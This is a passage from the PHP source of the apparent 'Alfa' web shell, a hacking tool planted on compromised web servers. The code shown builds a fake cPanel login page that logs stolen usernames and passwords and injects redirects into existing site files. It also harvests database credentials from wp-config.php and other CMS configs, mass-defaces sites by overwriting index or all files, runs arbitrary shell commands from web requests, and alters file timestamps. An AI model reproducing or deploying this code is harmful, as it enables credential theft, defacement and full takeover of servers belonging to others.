6663 $cpanel_log = '<?php $cook_time = time()+(86400 * 7); $user = $_POST["'.$post_user.'"];$pass = $_POST["'.$post_pass.'"];if(!empty($user) && !empty($pass)){if(!isset($_COOKIE["'.$cookie_name.'"])){@setcookie("'.$cookie_name.'", 0, $cook_time, "/");$_COOKIE["'.$cookie_name.'"]=1;}if((int)$_COOKIE["'.$cookie_name.'"]>'.$count.'){@header("Location: /");exit;}@setcookie("'.$cookie_name.'", ((int)$_COOKIE["'.$cookie_name.'"] + 1), $cook_time, "/");$fp = @fopen("'.$logto.'", "a+");@fwrite($fp, $user . " : " . $pass . "\n");fclose($fp);sleep(3);'.$resp_code.'exit;}?>';
6664
6665 @file_put_contents($fake_root.'/log.php', $cpanel_log);
6666
6667 if($panel == "cpanel"){
6668 $fake = preg_replace(array('#<link(.*)href="(.*)"(.*)>#', '#<img class="main-logo" src="(.*)"(.*)>#', '# <a(.*)id="reset_password">#'), array('<link href="'.$target.'/$2">', '<img class="main-logo" src="'.$target.'/$1" alt="logo" />', '<a href="#" id="reset_password">'), $fake);
6669 }
6670
6671 @file_put_contents($fake_root.'/index.php', $fake);
6672
6673 $inject_code = '<?php if(isset($_GET[":2083"])&&(int)$_COOKIE["'.$cookie_name.'"]<'.$count.'){@include("'.$fake_root.'/index.php");exit;}?>';
6674 $bind_on_code = '<?php if((int)$_COOKIE["'.$cookie_name.'"]<'.$count.'){@header("Location: '.$uri.'");exit;}?>';
6675
6676 @file_put_contents($inject_to, $inject_code . "\n" .@file_get_contents($inject_to));
6677 @file_put_contents($bind_on, $bind_on_code . "\n" .@file_get_contents($bind_on));
6678
6679 echo "success...!";
6680 }else{
6681 echo "failed...!";
6682 }
6683 }else{
6684 echo("<div style='text-align:center;color:red;'>Cannot open the target...!</div>");
6685 }
6686 }
6687 echo '</div>';
6688 alfafooter();
6689}
6690function alfaarchive_manager(){
6691 alfahead();
6692 $file = $_POST['alfa2'];
6693 if(!file_exists($file)){
6694 $file = $GLOBALS['cwd'];
6695 }
6696 $rand_id = rand(9999, 999999);
6697 echo '<div class=header><center><p><div class="txtfont_header">| Archive Manager |</div></p>';
6698 echo '<form name="srch" onSubmit="g(\'archive_manager\',null,null,this.file.value,null,null,\'>>\');return false;" method=\'post\'>
6699 <div class="txtfont">
6700 Archive file: <input size="50" id="target" type="text" name="file" value="'.$file.'">
6701 <input type="submit" name="btn" value=" "></div></form></center><br>';
6702 if($_POST['alfa5']=='>>'){
6703 //echo __pre();
6704 echo '<hr><div style="margin-left: 12px;" archive_full="phar://'.$file.'" archive_name="'.basename($file).'" id="archive_dir_'.$rand_id.'" class="archive_dir_holder"><span>PWD: </span><div class="archive_pwd_holder" style="display:inline-block"><a>/</a></div></div>';
6705 echo '<div style="padding: 10px;" id="archive_base_'.$rand_id.'">';
6706 __alfa_open_archive_file($file, $rand_id);
6707 echo '</div>';
6708 }
6709 echo '</div>';
6710 alfafooter();
6711}
6712function __alfa_open_archive_file($arch, $base_id=0){
6713 try{
6714 $files = array();
6715 $dirs = array();
6716 $archive = new PharData($arch);
6717 foreach($archive as $file) {
6718 $file_modify = @date('Y-m-d H:i:s', @filemtime($file->getPathname()));
6719 if($file->isDir()) {
6720 $dirs[] = array("name" => $file->getFileName(), "path" => $file->getPathname(), "type" => "dir", "modify" => $file_modify);
6721 }else{
6722 $file_size = @filesize($file->getPathname());
6723 $files[] = array("name" => $file->getFileName(), "path" => $file->getPathname(), "type" => "file", "modify" => $file_modify, "size" => $file_size);
6724 }
6725 }
6726 function __alfa_open_archive_usort($a, $b){
6727 return strcmp(strtolower($a['name']), strtolower($b['name']))*1;
6728 }
6729 usort($dirs, "__alfa_open_archive_usort");
6730 usort($files, "__alfa_open_archive_usort");
6731 $files = array_merge($dirs, $files);
6732 echo '<table width="100%" class="main" cellspacing="0" cellpadding="2"><tbody><tr><th>Name</th><th>Size</th><th>Modify</th><th>Actions</th></tr>';
6733 $icon = '<img class="archive-icons" src="'.findicon('..','dir').'" width="30" height="30">';
6734 echo '<tr><th><a base_id="'.$base_id.'" class="archive-file-row" fname=".." onclick="alfaOpenArchive(this);" path="'.dirname($arch.'.php').'">'.$icon.'<span class="archive-name archive-type-dir">| .. |</span></a><td>dir</td><td>-</td><td>-</td></tr>';
6735 foreach($files as $file){
6736 $icon = '<img class="archive-icons" src="'.findicon($file['name'],$file['type']).'" width="30" height="30">';
6737 if($file["type"] == "dir"){
6738 echo '<tr><th><a base_id="'.$base_id.'" class="archive-file-row" onclick="alfaOpenArchive(this);" path="'.$file["path"].'" fname="'.$file["name"].'">'.$icon.'<span class="archive-name archive-type-dir">| '.$file["name"].' |</span></a><td>dir</td><td>'.$file["modify"].'</td><td>-</td></tr>';
6739 }else{
6740 echo "<tr><th><a base_id='".$base_id."' class='archive-file-row' onclick=\"editor('".$file["path"]."','auto','','','','file');\">".$icon."<span class='archive-name archive-type-file' fname='".$file["name"]."'>".$file["name"]."</span></a><td>".alfaSize($file["size"])."</td><td>".$file["modify"]."</td><td>-</td></tr>";
6741
6742 }
6743 }
6744 echo '</table>';
6745 }catch(Exception $e){
6746 echo("0");
6747 }
6748}
6749function alfaopen_archive_dir(){
6750 $dir = $_POST["alfa1"];
6751 $base_id = $_POST["alfa2"];
6752 __alfa_open_archive_file($dir, $base_id);
6753}
6754function alfaconfig_grabber(){
6755 alfahead();
6756 echo '<div class=header><center><p><div class="txtfont_header">| Config Grabber |</div></p>';
6757 echo '<form name="srch" onSubmit="g(\'config_grabber\',null,null,this.dir.value,this.ext.value,null,\'>>\');return false;" method=\'post\'>
6758 <div class="txtfont">
6759 Dir: <input size="50" id="target" type="text" name="dir" value="'.$GLOBALS['cwd'].'">
6760 Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
6761 <input type="submit" name="btn" value=" "></div></form></center><br>';
6762 $dir = $_POST['alfa2'];
6763 $ext = $_POST['alfa3'];
6764 if($_POST['alfa5']=='>>'){
6765 echo __pre();
6766 Alfa_ConfigGrabber($dir, $ext);
6767 }
6768 echo '</div>';
6769 alfafooter();
6770}
6771function Alfa_ConfigGrabber($dir, $ext) {
6772 $pattern = "#define[ ]{0,}\([ ]{0,}(?:'|\")DB_HOST(?:'|\")[ ]{0,}|define[ ]{0,}\([ ]{0,}(?:'|\")DB_HOSTNAME(?:'|\")[ ]{0,}|config\[(?:'|\")MasterServer(?:'|\")\]\[(?:'|\")password(?:'|\")\]|(?:'|\")database(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")|(?:'|\")(mysql|database)(?:'|\")[ ]{0,}=>[ ]{0,}array|db_name|db_user|db_pass|db_server|db_host|dbhost|dbname|dbuser|dbpass|database_name|database_user|database_pass|mysql_user|mysql_pass|mysqli_connect|mysql_connect|new[ ]{0,}mysqli#i";
6773 $db_files = array("wp-config.php","configure.php","config.inc.php","configuration.php","config.php","conf.php","dbclass.php","class_core.php","dist-configure.php", "settings.php", "conf_global.php", "db.php", "connect.php", "confing.db.php", "config.db.php", "database.php");
6774 if(@is_readable($dir)){
6775 $globFiles = @glob("$dir/*.$ext");
6776 $globDirs = @glob("$dir/*", GLOB_ONLYDIR);
6777 $blacklist = array();
6778 foreach ($globDirs as $dir) {
6779 if(!@is_readable($dir)||@is_link($dir)) continue;
6780 @Alfa_ConfigGrabber($dir, $ext);
6781 }
6782 foreach ($globFiles as $file){
6783 $filee = @file_get_contents($file);
6784 if(preg_match($pattern, $filee)){
6785 echo "<div><span>$file</span> <a style='cursor:pointer;' onclick=\"editor('".$file."','auto','','','','file');\">[ View file ]</a></div>";
6786 }
6787 }
6788 }
6789}
6790function alfasearcher(){
6791alfahead();
6792echo '<div class=header><center><p><div class="txtfont_header">| Searcher |</div></p><h3><a href=javascript:void(0) onclick="g(\'searcher\',null,\'file\')">| Find Readable Or Writable Files | </a><a href=javascript:void(0) onclick="g(\'searcher\',null,\'str\')">| Find Files By Name | </a></h3></center>';
6793if(isset($_POST['alfa1'])&&$_POST['alfa1']=='file'){
6794echo '<center><div class="txtfont_header">| Find Readable Or Writable Files |</div><br><br><form name="srch" onSubmit="g(\'searcher\',null,\'file\',this.filename.value,this.ext.value,this.method.value,\'>>\');return false;" method=\'post\'>
6795<div class="txtfont">
6796Method: <select style="width: 18%;" onclick="alfa_searcher_tool(this.value);" name="method"><option value="files">Find All Writable Files</option><option value="dirs">Find All Writable Dirs</option><option value="all">Find All Readable And Writable Files</option></select>
6797Dir: <input size="50" id="target" type="text" name="filename" value="'.$GLOBALS['cwd'].'">
6798Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
6799<input type="submit" name="btn" value=" "></div></form></center><br>';
6800$dir = $_POST['alfa2'];
6801$ext = $_POST['alfa3'];
6802$method = $_POST['alfa4'];
6803if($_POST['alfa5']=='>>'){
6804echo __pre();
6805if(substr($dir,-1)=='/')$dir=substr($dir,0,-1);
6806Alfa_Searcher($dir,trim($ext),$method);
6807}
6808}
6809if($_POST['alfa1']=='str'){
6810echo '<center><div class="txtfont_header">| Find Files By Name / Find String In Files |</div><br><br><form onSubmit="g(\'searcher\',null,\'str\',this.dir.value,this.string.value,\'>>\',this.ext.value,this.method.value);return false;" method=\'post\'>
6811<div class="txtfont">
6812Method: <select name="method"><option value="name">Find Files By Name</option><option value="str">Find String In Files</option></select>
6813String: <input type="text" name="string" value="">
6814Dir: <input size="50" type="text" name="dir" value="'.$GLOBALS['cwd'].'">
6815Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
6816<input type="submit" name="btn" value=" "></div></form></center><br>';
6817$dir = $_POST['alfa2'];
6818$string = $_POST['alfa3'];
6819$ext = $_POST['alfa5'];
6820if(!empty($string) AND !empty($dir) AND $_POST['alfa4'] == '>>'){
6821echo __pre();
6822Alfa_StrSearcher($dir,$string,$ext,$_POST['alfa6']);
6823}
6824}
6825echo '</div>';
6826alfafooter();
6827}
6828function alfaMassDefacer(){
6829alfahead();
6830AlfaNum(5,6,7,8,9,10);
6831echo "<div class=header><center><p><div class='txtfont_header'>| Mass Defacer |</div></p><form onSubmit=\"g('MassDefacer',null,this.massdir.value,this.defpage.value,this.method.value,'>>');return false;\" method='post'>";
6832echo '<div class="txtfont">Deface Method: <select name="method"><option value="index">Deface Index Dirs</option><option value="all">All Files</option></select>
6833 Mass dir: <input size="50" id="target" type="text" name="massdir" value="'.htmlspecialchars($GLOBALS['cwd']).'">
6834 DefPage: <input size="50" type="text" name="defpage" value="'.htmlspecialchars($GLOBALS['cwd']).'"></div> <input type="submit" name="btn" value=" "></center></p>
6835</form>';
6836$dir = $_POST['alfa1'];
6837$defpage = $_POST['alfa2'];
6838$method = $_POST['alfa3'];
6839$fCurrent = $GLOBALS['__file_path'];
6840if($_POST['alfa4'] == '>>'){
6841if(!empty($dir)){
6842if(@is_dir($dir)){
6843if(@is_readable($dir)){
6844if(@is_file($defpage)){
6845if($dh = @opendir($dir)){
6846echo __pre();
6847while (($file = @readdir($dh)) !== false){
6848if($file == '..' || $file == '.')continue;
6849$newfile=$dir.$file;
6850if($fCurrent == $newfile)continue;
6851if(@is_dir($newfile)){
6852Alfa_ReadDir($newfile,$method,$defpage);
6853}else{
6854if(!@is_writable($newfile))continue;
6855if(!@is_readable($newfile))continue;
6856Alfa_Rewriter($newfile,$file,$defpage,$method);
6857}
6858}
6859closedir($dh);
6860}else{__alert('<font color="red">Error In OpenDir...</font>');}
6861}else{__alert('<font color="red">DefPage File NotFound...</font>');}
6862}else{__alert('<font color="red">Directory is not Readable...</font>');}
6863}else{__alert('<font color="red">Mass Dir is Invalid Dir...</font>');}
6864}else{__alert('<font color="red">Dir is Empty...</font>');}
6865}
6866echo '</div>';
6867alfafooter();
6868}
6869function Alfa_ReadDir($dir,$method='',$defpage=''){
6870if(!@is_readable($dir)) return false;
6871if (@is_dir($dir)) {
6872if ($dh = @opendir($dir)) {
6873while(($file=readdir($dh))!==false) {
6874if($file == '..' || $file == '.')continue;
6875$newfile=$dir.'/'.$file;
6876if(@is_readable($newfile)&&@is_dir($newfile))Alfa_ReadDir($newfile,$method,$defpage);
6877if(@is_file($newfile)){
6878if(!@is_readable($newfile))continue;
6879Alfa_Rewriter($newfile,$file,$defpage,$method);
6880}
6881}
6882closedir($dh);
6883}
6884}
6885}
6886function Alfa_Rewriter($dir,$file,$defpage,$m='index'){
6887if(!@is_writable($dir)) return false;
6888if(!@is_readable($dir)) return false;
6889$defpage=@file_get_contents($defpage);
6890if($m == 'index'){
6891$indexs = array('index.php','index.htm','index.html','default.asp','default.aspx','index.asp','index.aspx','index.js');
6892if(in_array(strtolower($file),$indexs)){
6893@file_put_contents($dir,$defpage);
6894echo @is_file($dir)?$dir."<b><font color='red'>DeFaced...</b></font><br>" : '';
6895}
6896}elseif($m=='all'){
6897@file_put_contents($dir,$defpage);
6898echo @is_file($dir)?$dir." <b><font color='red'>DeFaced...</b></font><br>" : '';
6899}
6900}
6901function alfaGetDisFunc(){
6902alfahead();
6903echo '<div class="header">';
6904$disfun = @ini_get('disable_functions');
6905$s = explode(',',$disfun);
6906$f = array_unique($s);
6907echo '<center><br><b><font color="#7CFC00">Disable Functions</font></b><pre><table border="1"><tr><td align="center" style="background-color: green;color: white;width:5%">#</td><td align="center" style="background-color: green;color: white;">Func Name</td></tr>';
6908$i=1;
6909foreach($f as $s){
6910$s=trim($s);
6911if(function_exists($s)||!is_callable($s))continue;
6912echo '<tr><td align="center" style="background-color: black;">'.$i.'</td>';
6913echo '<td align="center" style="background-color: black;"><a style="text-decoration: none;" target="_blank" href="http://php.net/manual/en/function.'.str_replace('_','-',$s).'.php"><span class="disable_functions"><b>'.$s.'</b></span></a></td>';
6914$i++;
6915}
6916echo '</table></center>';
6917echo '</div>';
6918alfafooter();
6919}
6920function Alfa_Create_A_Tag($action,$vals){
6921$nulls = array();
6922foreach($vals as $key => $val){
6923echo '<a href=javascript:void(0) onclick="g(\''.$action.'\',';
6924for($i=1;$i<=$val[1]-1;$i++)$nulls[] = 'null';
6925$f = implode(',',$nulls);
6926echo $f.',\''.$val[0].'\');return false;">| '.$key.' | </a>';
6927unset($nulls);
6928}
6929}
6930function Alfa_Searcher($dir, $ext, $method) {
6931if(@is_readable($dir)){
6932if($method == 'all')$ext = '*';
6933if($method == 'dirs')$ext = '*';
6934$globFiles = @glob("$dir/*.$ext");
6935$globDirs = @glob("$dir/*", GLOB_ONLYDIR);
6936$blacklist = array();
6937foreach ($globDirs as $dir) {
6938if(!@is_readable($dir)||@is_link($dir)) continue;
6939@Alfa_Searcher($dir, $ext, $method);
6940}
6941switch($method){
6942case "files":
6943foreach ($globFiles as $file){
6944if(@is_writable($file)){
6945echo "$file<br>";
6946}
6947}
6948break;
6949case "dirs":
6950foreach ($globFiles as $file){
6951if(@is_writable(dirname($file)) && !in_array(dirname($file), $blacklist)){
6952echo dirname($file).'<br>';
6953$blacklist[] = dirname($file);
6954}
6955}
6956break;
6957case "all":
6958foreach ($globFiles as $file){
6959echo $file.'<br>';
6960}
6961break;
6962}
6963unset($blacklist);
6964}
6965}
6966function AlfaiFrameCreator($f,$width='100%',$height='600px'){
6967return('<iframe src="'.$f.'" width="'.$width.'" height="'.$height.'" frameborder="0"></iframe>');
6968}
6969class AlfaCURL {
6970public $headers;
6971public $user_agent;
6972public $compression;
6973public $cookie_file;
6974public $proxy;
6975public $path;
6976public $ssl = true;
6977public $curl_status = true;
6978function __construct($cookies=false,$compression='gzip',$proxy=''){
6979if(!extension_loaded('curl')){$curl_status = false;return false;}
6980$this->headers[] = 'Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg';
6981$this->headers[] = 'Connection: Keep-Alive';
6982$this->headers[] = 'Content-type: application/x-www-form-urlencoded;charset=UTF-8';
6983$this->user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36)';
6984$this->path = ALFA_TEMPDIR.'/Alfa_cookies.txt';
6985$this->compression=$compression;
6986$this->proxy=$proxy;
6987$this->cookies=$cookies;
6988if($this->cookies)$this->cookie($this->path);
6989}
6990function cookie($cookie_file) {
6991if (_alfa_file_exists($cookie_file,false)) {
6992$this->cookie_file=$cookie_file;
6993}else{
6994@fopen($cookie_file,'w') or die($this->error('The cookie file could not be opened.'));
6995$this->cookie_file=$cookie_file;
6996@fclose($this->cookie_file);
6997}
6998}
6999function Send($url,$method="get",$data=""){
7000if(!$this->curl_status){return false;}
7001$process = curl_init($url);
7002curl_setopt($process, CURLOPT_HTTPHEADER, $this->headers);
7003curl_setopt($process, CURLOPT_HEADER, 0);
7004curl_setopt($process, CURLOPT_USERAGENT, $this->user_agent);
7005curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
7006curl_setopt($process, CURLOPT_ENCODING , $this->compression);
7007curl_setopt($process, CURLOPT_TIMEOUT, 30);
7008if($this->ssl){
7009curl_setopt($process, CURLOPT_SSL_VERIFYPEER ,false);
7010curl_setopt($process, CURLOPT_SSL_VERIFYHOST,false);
7011}
7012if($this->cookies){
7013curl_setopt($process, CURLOPT_COOKIEFILE, $this->path);
7014curl_setopt($process, CURLOPT_COOKIEJAR, $this->path);
7015}
7016if($this->proxy){
7017curl_setopt($process, CURLOPT_PROXY, $this->proxy);
7018}
7019if($method=='post'){
7020curl_setopt($process, CURLOPT_POSTFIELDS, $data);
7021curl_setopt($process, CURLOPT_POST, 1);
7022curl_setopt($process, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));
7023}
7024$return = @curl_exec($process);
7025curl_close($process);
7026return $return;
7027}
7028function error($error) {
7029echo "<center><div style='width:500px;border: 3px solid #FFEEFF; padding: 3px; background-color: #FFDDFF;font-family: verdana; font-size: 10px'><b>cURL Error</b><br>$error</div></center>";
7030die;
7031}
7032}
7033function getConfigHtml($cms){
7034$content = '';
7035$cms_array = array("wp" => "WordPress", "vb" => "vBulletin", "whmcs" => "Whmcs", "joomla" => "Joomla", "phpnuke" => "PHPNuke","phpbb"=>"PHPBB","mybb"=>"MyBB","drupal"=>"Drupal","smf"=>"SMF");
7036$content .= "<form class='getconfig' onSubmit='g(\"GetConfig\",null,this.cms.value,this.path.value,this.getAttribute(\"base_id\"));return false;'><div class='txtfont'>Cms: </div> <select name='cms'style='width:100px;'>";
7037foreach($cms_array as $key => $val){
7038$content .= "<option value='{$key}' ".($key==$cms?'selected=selected':'').">{$val}</option>";
7039}
7040$content .= "</select> <div class='txtfont'>Path(installed cms/Config): </div> <input type='text' name='path' value='".$_SERVER['DOCUMENT_ROOT']."/' size='30' /> <button class='button'>GetConfig</button>";
7041$content .= "</form>";
7042return $content;
7043}
7044if (!function_exists('json_encode')){
7045 function json_encode($a=false){
7046 if (is_null($a)) return 'null';
7047 if ($a === false) return 'false';
7048 if ($a === true) return 'true';
7049 if (is_scalar($a))
7050 {
7051 if (is_float($a))
7052 {
7053 return floatval(str_replace(",", ".", strval($a)));
7054 }
7055
7056 if (is_string($a))
7057 {
7058 static $jsonReplaces = array(array("\\", "/", "\n", "\t", "\r", "\b", "\f", '"'), array('\\\\', '\\/', '\\n', '\\t', '\\r', '\\b', '\\f', '\"'));
7059 return '"' . str_replace($jsonReplaces[0], $jsonReplaces[1], $a) . '"';
7060 }
7061 else
7062 return $a;
7063 }
7064 $isList = true;
7065 for ($i = 0, reset($a); $i < count($a); $i++, next($a))
7066 {
7067 if (key($a) !== $i)
7068 {
7069 $isList = false;
7070 break;
7071 }
7072 }
7073 $result = array();
7074 if ($isList)
7075 {
7076 foreach ($a as $v) $result[] = json_encode($v);
7077 return '[' . join(',', $result) . ']';
7078 }
7079 else
7080 {
7081 foreach ($a as $k => $v) $result[] = json_encode($k).':'.json_encode($v);
7082 return '{' . join(',', $result) . '}';
7083 }
7084 }
7085}
7086if ( !function_exists('json_decode') ){
7087function json_decode($json, $array=true){
7088 $comment = false;
7089 $out = '$x=';
7090 for ($i=0; $i<strlen($json); $i++)
7091 {
7092 if (!$comment)
7093 {
7094 if ($json[$i] == '{' || $json[$i] == '['){$out .= ' array(';}
7095 else if ($json[$i] == '}' || $json[$i] == ']'){$out .= ')';}
7096 else if ($json[$i] == ':'){$out .= '=>';}
7097 else {$out .= $json[$i];}
7098 }
7099 else $out .= $json[$i];
7100 if ($json[$i] == '"') $comment = !$comment;
7101 }
7102 eval($out . ';');
7103 return $x;
7104}
7105}
7106function alfaterminalExec(){
7107 $pwd = "pwd";
7108 $seperator = ";";
7109 if($GLOBALS['sys']!='unix'){
7110 $pwd = "cd";
7111 $seperator = "&";
7112 }
7113 if($GLOBALS["glob_chdir_false"]&&!empty($_POST["c"])){$cmd = "cd '".addslashes($_POST["c"])."'".$seperator;}
7114 $current_path = '';
7115 if(preg_match("/cd[ ]{0,}(.*)[ ]{0,}".$seperator."|cd[ ]{0,}(.*)[ ]{0,}/i", $_POST['alfa1'], $match)){
7116 if(empty($match[1])){
7117 $match[1] = $match[2];
7118 }
7119 $current_path = alfaEx("cd ".addslashes($match[1]).$seperator.$pwd);
7120 $current_path = str_replace("\\", "/", $current_path);
7121 }
7122 $out = alfaEx($cmd.$_POST['alfa1'], true);
7123 $out = htmlspecialchars($out);
7124 echo json_encode(array("output" => convertBash($out), "path" => $current_path));
7125}
7126function convertBash($code) {
7127 $dictionary = array(
7128 '[01;30m' => '<span style="color:black">',
7129 '[01;31m' => '<span style="color:red">',
7130 '[01;32m' => '<span style="color:green">',
7131 '[01;33m' => '<span style="color:yellow">',
7132 '[01;34m' => '<span style="color:blue">',
7133 '[01;35m' => '<span style="color:purple">',
7134 '[01;36m' => '<span style="color:cyan">',
7135 '[01;37m' => '<span style="color:white">',
7136 '[0m' => '</span>'
7137 );
7138 $htmlString = str_replace(array_keys($dictionary), $dictionary, $code);
7139 return $htmlString;
7140}
7141function alfadoActions(){
7142 $chdir_fals = false;
7143 if(!@chdir($_POST['c'])){
7144 $chdir_fals = true;
7145 $alfa_canruncmd = _alfa_can_runCommand(true,true);
7146 }
7147 if(isset($_POST['alfa1']))$_POST['alfa1'] = rawurldecode($_POST['alfa1']);
7148 if(isset($_POST['alfa2']))$_POST['alfa2'] = rawurldecode($_POST['alfa2']);
7149 $action = $_POST["alfa3"];
7150 if($action == "permission"){
7151 $perms = 0;
7152 $perm = $_POST["alfa2"];
7153 for($i=strlen($perm)-1;$i>=0;--$i){
7154 $perms += (int)$perm[$i]*pow(8, (strlen($perm)-$i-1));
7155 }
7156 if(@chmod($_POST['alfa1'], $perms)){
7157 echo("done");
7158 }else{
7159 echo("no");
7160 }
7161 return;
7162 }
7163 if($action == "rename" || $action == "move"){
7164 $alfa1_decoded = $_POST['alfa1'];
7165 if($chdir_fals){
7166 $_POST['alfa1'] = $_POST["c"]."/".$_POST["alfa1"];
7167 }
7168 $_POST['alfa1'] = trim($_POST['alfa1']);
7169 $alfa1_escape = addslashes($_POST["alfa1"]);
7170 if($_POST["alfa3"] == "rename"){
7171 $_POST['alfa2'] = basename($_POST['alfa2']);
7172 }
7173 if(!empty($_POST['alfa2'])){
7174 $cmd_rename = false;
7175 if($chdir_fals&&$alfa_canruncmd){
7176 if(_alfa_is_writable($_POST['alfa1'])){
7177 $cmd_rename = true;
7178 $alfa1_escape = addslashes($alfa1_decoded);
7179 alfaEx("cd '".addslashes($_POST['c'])."';mv '".$alfa1_escape."' '".addslashes($_POST['alfa2'])."'");
7180 }
7181 }
7182 if(!file_exists($_POST['alfa2'])){
7183 if(@rename($_POST['alfa1'], $_POST['alfa2'])||$cmd_rename){
7184 echo "done";
7185 }else{
7186 echo "no";
7187 }
7188 }else{
7189 echo "no";
7190 }
7191 }
7192 }elseif($action == "copy"){
7193 if(is_dir($_POST["alfa1"])){
7194 $dir = str_replace('//', '/', $_POST["alfa1"]);
7195 $dir = explode('/', $dir);
7196 if(empty($dir[count($dir) - 1])){
7197 $name = $dir[count($dir) - 2];
7198 }else{
7199 $name = $dir[count($dir) - 1];
7200 }
7201 }else{
7202 $name = basename($_POST["alfa1"]);
7203 }
7204 $dir = dirname($_POST["alfa1"]);
7205 if($dir == "."){
7206 $dir = $_POST["c"]."/";
7207 }
7208 if(is_file($_POST["alfa1"])){
7209 @copy($_POST["alfa1"], $_POST["alfa2"]);
7210 echo("done");
7211 }elseif(is_dir($_POST["alfa1"])){
7212 if(!is_dir($_POST["alfa2"])){
7213 mkdir($_POST["alfa2"], 0755, true);
7214 }
7215 copy_paste($dir, $name , $_POST["alfa2"] . "/");
7216 echo("done");
7217 }
7218 }elseif($action == "modify"){
7219 if( !empty($_POST['alfa1']) ) {
7220 $time = strtotime($_POST['alfa1']);
7221 if($time){
7222 $touched = false;
7223 if($chdir_fals&&$alfa_canruncmd){
7224 alfaEx("cd '".addslashes($_POST["c"])."';touch -d '".htmlspecialchars(addslashes($_POST['alfa1']))."' '".addslashes($_POST['alfa2'])."'");
7225 $touched = true;
7226 }
7227 if(!@touch($_POST['alfa2'],$time,$time)&&!$touched){
7228 echo 'no';
7229 }else{
7230 echo 'ok';
7231 }
7232 } else{
7233 echo 'badtime';
7234 }
7235 }
7236 }
7237
7238}
7239function alfaget_flags(){
7240 $flags = array();
7241 if(function_exists("curl_version")){
7242 $curl = new AlfaCURL();
7243 $server_addr = (!@$_SERVER["SERVER_ADDR"]?(function_exists("gethostbyname")?@gethostbyname($_SERVER['SERVER_NAME']):'????'):@$_SERVER["SERVER_ADDR"]);
7244 $flag = $curl->Send("http://www.geoplugin.net/json.gp?ip=" . $server_addr);
7245 $flag2 = $curl->Send("http://www.geoplugin.net/json.gp?ip=" . $_SERVER["REMOTE_ADDR"]);
7246 if(strpos($flag2, "geoplugin") != false){
7247 $flag = json_decode($flag, true);
7248 $flag2 = json_decode($flag2, true);
7249 if(!empty($flag['geoplugin_countryCode'])){
7250 $flags["server"]["name"] = $flag['geoplugin_countryName'];
7251 $flags["server"]["code"] = $flag['geoplugin_countryCode'];
7252 }
7253 if(!empty($flag2['geoplugin_countryCode'])){
7254 $flags["client"]["name"] = $flag2['geoplugin_countryName'];
7255 $flags["client"]["code"] = $flag2['geoplugin_countryCode'];
7256 }
7257 }
7258 }
7259 echo json_encode($flags);
7260}
7261function alfaGetConfig(){
7262$cms = $_POST['alfa1'];
7263$path = trim($_POST['alfa2']);
7264$config = array(
7265'wp'=>array('file'=>'/wp-config.php',
7266'host'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_HOST(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1),
7267'dbname'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_NAME(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1),
7268'dbuser'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_USER(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1),
7269'dbpw'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_PASSWORD(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1),
7270'prefix'=>array("/table_prefix[ ]{0,}=[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,};/",1)
7271),
7272'drupal'=>array('file'=>'/config.php',
7273'host'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_HOSTNAME(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1),
7274'dbname'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_DATABASE(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1),
7275'dbuser'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_USERNAME(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1),
7276'dbpw'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_PASSWORD(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1),
7277'prefix'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_PREFIX(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1)
7278),
7279'drupal2'=>array('file'=>'/sites/default/settings.php',
7280'host'=>array("/(?:'|\")host(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/",1),
7281'dbname'=>array("/(?:'|\")database(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/",1),
7282'dbuser'=>array("/(?:'|\")username(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/",1),
7283'dbpw'=>array("/(?:'|\")password(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/",1),
7284'prefix'=>array("/(?:'|\")prefix(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/",1)
7285),
7286'vb'=>array('file'=>'/includes/config.php',
7287'host'=>array("/config\[(?:'|\")MasterServer(?:'|\")\]\[(?:'|\")servername(?:'|\")\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/",3),
